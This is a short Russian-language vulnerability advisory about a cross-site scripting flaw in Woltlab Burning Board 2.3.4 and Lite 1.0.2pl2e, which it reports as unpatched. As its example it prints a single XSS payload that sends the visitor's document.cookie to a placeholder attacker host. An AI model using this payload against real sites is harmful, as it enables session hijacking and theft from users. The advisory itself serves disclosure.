Межсайтовый скриптинг в Woltlab Burning Board

Дата публикации:
24.03.2006
Всего просмотров:
2558
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Woltlab Burning Board 2.x
WoltLab Burning Board Lite 1.x
Уязвимые версии:
Woltlab Burning Board 2.3.4
Woltlab Burning Board Lite 1.0.2pl2e

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в сценарии "acp/lib/class_db_mysql.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

/wbb/xx.php?<script>location.href='http://yoursite.com/xss.php?
cook='+escape(document.cookie)</script>

URL производителя: http://www.woltlab.de/products/burning_board_lite/index_en.php

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Xss in Wbb 2.3.4

или введите имя

CAPTCHA